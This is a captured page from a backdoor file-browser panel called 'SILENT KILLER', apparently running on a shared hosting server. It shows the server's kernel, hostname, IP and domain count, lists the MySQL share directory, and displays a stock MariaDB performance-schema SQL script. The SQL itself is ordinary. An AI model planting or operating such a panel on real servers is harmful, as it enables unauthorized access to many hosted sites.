SILENT KILLERPanel

Current Path: > > > > usr > share > mysql >


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: ////usr/share/mysql/

NameTypeSizeLast ModifiedActions
bulgarian Directory - -
charsets Directory - -
chinese Directory - -
czech Directory - -
danish Directory - -
dutch Directory - -
english Directory - -
estonian Directory - -
french Directory - -
german Directory - -
greek Directory - -
hindi Directory - -
hungarian Directory - -
italian Directory - -
japanese Directory - -
korean Directory - -
norwegian Directory - -
norwegian-ny Directory - -
policy Directory - -
polish Directory - -
portuguese Directory - -
romanian Directory - -
russian Directory - -
serbian Directory - -
slovak Directory - -
spanish Directory - -
swedish Directory - -
systemd Directory - -
ukrainian Directory - -
binary-configure File 1155 bytes May 28 2025 17:32:49.
errmsg-utf8.txt File 716465 bytes May 28 2025 17:32:49.
fill_help_tables.sql File 2155153 bytes May 28 2025 17:32:49.
magic File 1470 bytes May 28 2025 17:32:49.
maria_add_gis_sp.sql File 1705 bytes May 28 2025 17:32:49.
maria_add_gis_sp_bootstrap.sql File 1683 bytes May 28 2025 17:32:49.
mysql-log-rotate File 894 bytes May 28 2025 17:32:49.
mysql.server File 12681 bytes May 28 2025 17:32:49.
mysql_performance_tables.sql File 1958 bytes May 28 2025 17:32:49.
mysql_sys_schema.sql File 619721 bytes May 28 2025 17:32:49.
mysql_system_tables.sql File 30572 bytes May 28 2025 17:32:49.
mysql_system_tables_data.sql File 3327 bytes May 28 2025 17:32:49.
mysql_test_data_timezone.sql File 10413 bytes May 28 2025 17:32:49.
mysql_test_db.sql File 1679 bytes May 28 2025 17:32:49.
mysqld_multi.server File 1564 bytes May 28 2025 17:32:49.
wsrep.cnf File 3474 bytes May 28 2025 17:32:49.
wsrep_notify File 4979 bytes May 28 2025 17:32:49.

Reading File: ////usr/share/mysql//mysql_performance_tables.sql

--
-- PERFORMANCE SCHEMA INSTALLATION
-- Note that this script is also reused by mysql_upgrade,
-- so we have to be very careful here to not destroy any
-- existing database named 'performance_schema' if it
-- can contain user data.
-- In case of downgrade, it's ok to drop unknown tables
-- from a future version, as long as they belong to the
-- performance schema engine.
--

set @have_old_pfs= (select count(*) from information_schema.schemata where schema_name='performance_schema');

SET @cmd="SET @broken_tables = (select count(*) from information_schema.tables  where engine != 'PERFORMANCE_SCHEMA' and table_schema='performance_schema')";

-- Work around for bug#49542
SET @str = IF(@have_old_pfs = 1, @cmd, 'SET @broken_tables = 0');
PREPARE stmt FROM @str;
EXECUTE stmt;
DROP PREPARE stmt;

SET @cmd="SET @broken_views = (select count(*) from information_schema.views where table_schema='performance_schema')";

-- Work around for bug#49542
SET @str = IF(@have_old_pfs = 1, @cmd, 'SET @broken_views = 0');
PREPARE stmt FROM @str;
EXECUTE stmt;
DROP PREPARE stmt;

SET @broken_routines = (select count(*) from mysql.proc where db='performance_schema');

SET @broken_events = (select count(*) from mysql.event where db='performance_schema');

SET @broken_pfs= (select @broken_tables + @broken_views + @broken_routines + @broken_events);

--
-- The performance schema database.
-- Only drop and create the database if this is safe (no broken_pfs).
-- This database is created, even in --without-perfschema builds,
-- so that the database name is always reserved by the MySQL implementation.
--

SET @cmd= "DROP DATABASE IF EXISTS performance_schema";

SET @str = IF(@broken_pfs = 0, @cmd, 'SET @dummy = 0');
PREPARE stmt FROM @str;
EXECUTE stmt;
DROP PREPARE stmt;

SET @cmd= "CREATE DATABASE performance_schema character set utf8mb3";

SET @str = IF(@broken_pfs = 0, @cmd, 'SET @dummy = 0');
PREPARE stmt FROM @str;
EXECUTE stmt;
DROP PREPARE stmt;

SILENT KILLER Tool